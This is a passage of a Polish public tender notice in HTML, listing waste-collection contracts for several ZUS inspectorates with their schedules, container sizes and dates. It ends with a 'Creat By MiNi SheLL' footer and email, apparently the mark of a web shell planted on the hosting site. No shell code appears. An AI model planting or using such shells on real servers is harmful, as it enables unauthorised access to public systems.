Przedmiot zamówienia należy realizować od dnia 01.02.2013 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Inspektorat ZUS w Pruszczu Gdańskim, ul. Wita Stwosza 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z posesji Inspektoratu ZUS w Pruszczu Gdańskim, ul. Wita Stwosza 7.
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS w Pruszczu Gdańskim - 1 raz w tygodniu (wtorek),
2) najem pojemników na nieczystości w ilości - 1 sztuka o pojemności 1,1 m3,
3) wywóz skoszonej trawy (koszona pow.: 134,90 m2) w okresie od maja do października, 1 raz w tygodniu (piątek).
Przedmiot zamówienia należy realizować od dnia 01.02.2013 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Inspektorat ZUS w Wejherowie, ul. Sobieskiego 294.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z posesji Inspektoratu ZUS w Wejherowie, ul. Sobieskiego 294.
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS w Wejherowie - 2 razy w tygodniu (poniedziałek i piątek),
2) najem pojemników na nieczystości w ilości - 1 sztuka o pojemności 1,1 m3.
Przedmiot zamówienia należy realizować od dnia 01.01.2013 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Inspektorat ZUS w Kartuzach, ul. Ceynowy 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z posesji Inspektoratu ZUS w Kartuzach, ul. Ceynowy 5.
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS w Kartuzach - 2 razy w tygodniu (wtorek i piątek),
2) najem pojemników na nieczystości w ilości - 1 sztuka o pojemności 1,1 m3,
3) wywóz skoszonej trawy (koszona pow.: 1.534,84 m2) w okresie od maja do października, 1 raz w tygodniu (piątek).
Przedmiot zamówienia należy realizować od dnia 01.04.2013 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Inspektorat ZUS w Kościerzynie, ul. 3-go Maja 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z posesji Inspektoratu ZUS w Kościerzynie, ul. 3-go Maja 9.
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS w Kościerzynie - 1 raz w tygodniu (poniedziałek),
2) najem pojemników na nieczystości w ilości - 1 sztuka o pojemności 1,1 m3.
Przedmiot zamówienia należy realizować od dnia 01.02.2013 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Inspektorat ZUS w Kwidzynie, ul. Piłsudskiego 29A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z posesji Inspektoratu ZUS w Kwidzynie, ul. Piłsudskiego 29A.
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS w Kwidzynie - 1 raz w tygodniu (poniedziałek),
2) najem pojemników na nieczystości w ilości - 1 sztuka o pojemności 1,1 m3 lub 0,9 m3.
Przedmiot zamówienia należy realizować od dnia 01.01.2013 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Inspektorat ZUS w Tczewie, ul. Jagiellońska 55.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z posesji Inspektoratu ZUS w Tczewie, ul. Jagiellońska 55.
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS w Tczewie - 3 razy w tygodniu (poniedziałek, środa, piątek),
2) najem pojemników na nieczystości w ilości - 1 sztuka o pojemności 1,2 m3.
Przedmiot zamówienia należy realizować od dnia 01.04.2013 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com